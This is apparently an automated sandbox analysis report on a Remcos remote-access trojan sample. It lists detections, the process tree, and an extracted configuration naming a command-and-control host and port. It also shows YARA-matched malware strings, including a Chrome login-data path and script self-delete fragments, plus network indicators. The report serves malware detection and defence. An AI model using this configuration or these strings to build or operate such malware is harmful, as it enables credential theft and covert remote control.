Play interactive tour

Edit tour

Analysis Report V8IB839cvz.exe

Overview

General Information

Sample Name:	V8IB839cvz.exe
Analysis ID:	429553
MD5:	10d42f55d89b6fd42404e470e68f1996
SHA1:	3b9787bbfaae456fe082db8e2e61c70c5fb45328
SHA256:	b84a345efddfa5a852c3e3c5c2c97dab1a6f4643906d80c0c8cafa1e25247326
Tags:	exeRATRemcosRAT
Infos:
Most interesting Screenshot:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Remcos RAT

C2 URLs / IPs found in malware configuration

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Delayed program exit found

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Execution from Suspicious Folder

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

V8IB839cvz.exe (PID: 7136 cmdline: 'C:\Users\user\Desktop\V8IB839cvz.exe' MD5: 10D42F55D89B6FD42404E470E68F1996)

V8IB839cvz.exe (PID: 6584 cmdline: C:\Users\user\Desktop\V8IB839cvz.exe MD5: 10D42F55D89B6FD42404E470E68F1996)

cmd.exe (PID: 2228 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6540 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Xypgtv.exe (PID: 6740 cmdline: 'C:\Users\Public\Xypgtv\Xypgtv.exe' MD5: 10D42F55D89B6FD42404E470E68F1996)

Xypgtv.exe (PID: 6480 cmdline: C:\Users\Public\Xypgtv\Xypgtv.exe MD5: 10D42F55D89B6FD42404E470E68F1996)

Xypgtv.exe (PID: 7004 cmdline: 'C:\Users\Public\Xypgtv\Xypgtv.exe' MD5: 10D42F55D89B6FD42404E470E68F1996)

Xypgtv.exe (PID: 6324 cmdline: C:\Users\Public\Xypgtv\Xypgtv.exe MD5: 10D42F55D89B6FD42404E470E68F1996)

cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "nothinglike.ac.ug:6969:0brudfascaqezd.ac.ug:6969:0", "Assigned name": "vvvvvvvvvv", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "daxvxdsaxzcas-LAPFBZ", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "wikipedia;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "10000"}

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\vtgpyX.url	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0x14:$file: URL= 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source	Rule	Description	Author	Strings
0000000F.00000002.778791601.0000000000449000.00000002.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000002.00000000.688515879.0000000000449000.00000004.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000003.729900326.0000000002410000.00000004.00000001.sdmp	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0x9b4:$file: URL= 0x998:$url_explicit: [InternetShortcut]
00000009.00000003.731801392.0000000002444000.00000004.00000001.sdmp	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0xc28:$file: URL= 0xc0c:$url_explicit: [InternetShortcut]
00000002.00000000.688799265.0000000000449000.00000002.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000B.00000003.749959961.0000000002820000.00000004.00000001.sdmp	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0x9b4:$file: URL= 0x998:$url_explicit: [InternetShortcut]
00000011.00000000.795919569.0000000000449000.00000004.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000003.730552799.0000000002444000.00000004.00000001.sdmp	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0xa98:$file: URL= 0xa7c:$url_explicit: [InternetShortcut]
0000000F.00000000.777883581.0000000000449000.00000002.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000003.731106098.0000000002444000.00000004.00000001.sdmp	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0xae8:$file: URL= 0xacc:$url_explicit: [InternetShortcut]
00000009.00000003.731257935.0000000002444000.00000004.00000001.sdmp	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0xb18:$file: URL= 0xafc:$url_explicit: [InternetShortcut]
0000000F.00000000.777134487.0000000000449000.00000002.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000B.00000003.749327450.000000000284C000.00000004.00000001.sdmp	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0x3e40:$file: URL= 0x3e24:$url_explicit: [InternetShortcut]
0000000B.00000003.750252073.0000000002854000.00000004.00000001.sdmp	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0xa98:$file: URL= 0xa7c:$url_explicit: [InternetShortcut]
00000011.00000000.797923003.0000000000449000.00000002.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000003.729493553.0000000002428000.00000004.00000001.sdmp	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0x2008:$file: URL= 0x1fec:$url_explicit: [InternetShortcut]
0000000F.00000000.776696975.0000000000449000.00000004.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000003.728627251.000000000243C000.00000004.00000001.sdmp	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0x3e40:$file: URL= 0x3e24:$url_explicit: [InternetShortcut]
0000000B.00000003.751417519.0000000002854000.00000004.00000001.sdmp	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0xc28:$file: URL= 0xc0c:$url_explicit: [InternetShortcut]
0000000B.00000003.750787460.0000000002854000.00000004.00000001.sdmp	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0xb18:$file: URL= 0xafc:$url_explicit: [InternetShortcut]
00000002.00000000.689160997.0000000000449000.00000002.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000B.00000003.749703567.0000000002838000.00000004.00000001.sdmp	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0x2008:$file: URL= 0x1fec:$url_explicit: [InternetShortcut]
0000000B.00000003.751016095.0000000002854000.00000004.00000001.sdmp	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0xbb0:$file: URL= 0xb94:$url_explicit: [InternetShortcut]
00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000011.00000000.796293762.0000000000449000.00000002.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000011.00000002.798843830.0000000000449000.00000002.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000003.731519002.0000000002444000.00000004.00000001.sdmp	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0xbb0:$file: URL= 0xb94:$url_explicit: [InternetShortcut]
0000000B.00000003.750523839.0000000002854000.00000004.00000001.sdmp	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0xae8:$file: URL= 0xacc:$url_explicit: [InternetShortcut]
Process Memory Space: Xypgtv.exe PID: 6324	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: Xypgtv.exe PID: 6480	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: V8IB839cvz.exe PID: 6584	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Click to see the 26 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.V8IB839cvz.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
2.2.V8IB839cvz.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x5487c:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x54d88:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x54788:$str_b2: Executing file: 0x5a06c:$str_b3: GetDirectListeningPort 0x54b78:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x54ecc:$str_b5: licence_code.txt 0x54cf8:$str_b7: \update.vbs 0x547f8:$str_b9: Downloaded file: 0x547c4:$str_b10: Downloading file: 0x547ac:$str_b12: Failed to upload file: 0x5a040:$str_b13: StartForward 0x5a060:$str_b14: StopForward 0x54c50:$str_b15: fso.DeleteFile " 0x54be4:$str_b16: On Error Resume Next 0x54c80:$str_b17: fso.DeleteFolder " 0x5479c:$str_b18: Uploaded file: 0x54838:$str_b19: Unable to delete: 0x54c18:$str_b20: while fso.FileExists(" 0x549b5:$str_c0: [Firefox StoredLogins not found] 0x548e9:$str_c2: [Chrome StoredLogins found, cleared!] 0x548c5:$str_c3: [Chrome StoredLogins not found]
17.2.Xypgtv.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.2.Xypgtv.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x5487c:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x54d88:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x54788:$str_b2: Executing file: 0x5a06c:$str_b3: GetDirectListeningPort 0x54b78:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x54ecc:$str_b5: licence_code.txt 0x54cf8:$str_b7: \update.vbs 0x547f8:$str_b9: Downloaded file: 0x547c4:$str_b10: Downloading file: 0x547ac:$str_b12: Failed to upload file: 0x5a040:$str_b13: StartForward 0x5a060:$str_b14: StopForward 0x54c50:$str_b15: fso.DeleteFile " 0x54be4:$str_b16: On Error Resume Next 0x54c80:$str_b17: fso.DeleteFolder " 0x5479c:$str_b18: Uploaded file: 0x54838:$str_b19: Unable to delete: 0x54c18:$str_b20: while fso.FileExists(" 0x549b5:$str_c0: [Firefox StoredLogins not found] 0x548e9:$str_c2: [Chrome StoredLogins found, cleared!] 0x548c5:$str_c3: [Chrome StoredLogins not found]
15.2.Xypgtv.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
15.2.Xypgtv.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x5487c:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x54d88:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x54788:$str_b2: Executing file: 0x5a06c:$str_b3: GetDirectListeningPort 0x54b78:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x54ecc:$str_b5: licence_code.txt 0x54cf8:$str_b7: \update.vbs 0x547f8:$str_b9: Downloaded file: 0x547c4:$str_b10: Downloading file: 0x547ac:$str_b12: Failed to upload file: 0x5a040:$str_b13: StartForward 0x5a060:$str_b14: StopForward 0x54c50:$str_b15: fso.DeleteFile " 0x54be4:$str_b16: On Error Resume Next 0x54c80:$str_b17: fso.DeleteFolder " 0x5479c:$str_b18: Uploaded file: 0x54838:$str_b19: Unable to delete: 0x54c18:$str_b20: while fso.FileExists(" 0x549b5:$str_c0: [Firefox StoredLogins not found] 0x548e9:$str_c2: [Chrome StoredLogins found, cleared!] 0x548c5:$str_c3: [Chrome StoredLogins not found]
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\Public\Xypgtv\Xypgtv.exe, CommandLine: C:\Users\Public\Xypgtv\Xypgtv.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Xypgtv\Xypgtv.exe, NewProcessName: C:\Users\Public\Xypgtv\Xypgtv.exe, OriginalFileName: C:\Users\Public\Xypgtv\Xypgtv.exe, ParentCommandLine: 'C:\Users\Public\Xypgtv\Xypgtv.exe' , ParentImage: C:\Users\Public\Xypgtv\Xypgtv.exe, ParentProcessId: 6740, ProcessCommandLine: C:\Users\Public\Xypgtv\Xypgtv.exe, ProcessId: 6480

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 17.2.Xypgtv.exe.400000.0.unpack

Malware Configuration Extractor: Remcos {"Host:Port:Password": "nothinglike.ac.ug:6969:0brudfascaqezd.ac.ug:6969:0", "Assigned name": "vvvvvvvvvv", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "daxvxdsaxzcas-LAPFBZ", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "wikipedia;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "10000"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\Public\Xypgtv\Xypgtv.exe

ReversingLabs: Detection: 41%

Multi AV Scanner detection for submitted file

Show sources

Source: V8IB839cvz.exe

ReversingLabs: Detection: 41%

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 0000000F.00000002.778791601.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.688515879.0000000000449000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.688799265.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.795919569.0000000000449000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.777883581.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.777134487.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.797923003.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.776696975.0000000000449000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.689160997.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.796293762.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.798843830.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Xypgtv.exe PID: 6324, type: MEMORY
Source: Yara match	File source: Process Memory Space: Xypgtv.exe PID: 6480, type: MEMORY
Source: Yara match	File source: Process Memory Space: V8IB839cvz.exe PID: 6584, type: MEMORY
Source: Yara match	File source: 2.2.V8IB839cvz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\Public\Xypgtv\Xypgtv.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: V8IB839cvz.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Code function: 2_2_00427D99 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

Source: V8IB839cvz.exe, 00000002.00000000.688515879.0000000000449000.00000004.00000001.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\V8IB839cvz.exe	Unpacked PE file: 2.2.V8IB839cvz.exe.400000.0.unpack
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	Unpacked PE file: 15.2.Xypgtv.exe.400000.0.unpack
Source: C:\Users\Public\Xypgtv\Xypgtv.exe	Unpacked PE file: 17.2.Xypgtv.exe.400000.0.unpack

Source: V8IB839cvz.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.4:49759 version: TLS 1.2

Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_004041E6 FindFirstFileW,FindNextFileW,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_0043C2E9 FindFirstFileExA,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_00406317 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_0041146E FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_004074C9 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_004076E4 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_00406776 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Code function: 2_2_004049A0 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: nothinglike.ac.ug

Source: global traffic

TCP traffic: 192.168.2.4:49745 -> 79.134.225.25:6969

Source: Joe Sandbox View	IP Address: 79.134.225.25 79.134.225.25
Source: Joe Sandbox View	IP Address: 162.159.130.233 162.159.130.233
Source: Joe Sandbox View	IP Address: 162.159.130.233 162.159.130.233

Source: Joe Sandbox View

ASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Code function: 2_2_0040D14F SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,Sleep,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,

Source: unknown

DNS traffic detected: queries for: cdn.discordapp.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.4:49759 version: TLS 1.2

Source: C:\Users\user\Desktop\V8IB839cvz.exe

E-Banking Fraud:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 0000000F.00000002.778791601.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.688515879.0000000000449000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.688799265.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.795919569.0000000000449000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.777883581.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.777134487.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.797923003.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.776696975.0000000000449000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.689160997.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.796293762.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.798843830.0000000000449000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Xypgtv.exe PID: 6324, type: MEMORY
Source: Yara match	File source: Process Memory Space: Xypgtv.exe PID: 6480, type: MEMORY
Source: Yara match	File source: Process Memory Space: V8IB839cvz.exe PID: 6584, type: MEMORY
Source: Yara match	File source: 2.2.V8IB839cvz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 2.2.V8IB839cvz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown

Source: C:\Users\user\Desktop\V8IB839cvz.exe

Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_0040C00C
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_0041C086
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_0042E10C
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_00443116
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_0041426F
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_0042A35E
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_00441327
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_0042D48A
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_0041C724
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_0041C867
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_0042D8A2
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_00441A39
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_00447B40
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_0041BB8F
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_0042DCD7
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_0042FCE9
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_00412CF0
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_0042AE10
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_00427EA4
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_0042FF18
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_00436FF0
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: 2_2_0042CF8E

Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: String function: 00429310 appears 50 times
Source: C:\Users\user\Desktop\V8IB839cvz.exe	Code function: String function: 0040207E appears 51 times

Source: V8IB839cvz.exe	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Xypgtv.exe.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

Source: V8IB839cvz.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Source: 00000009.00000003.729900326.0000000002410000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000009.00000003.731801392.0000000002444000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.749959961.0000000002820000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000009.00000003.730552799.0000000002444000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
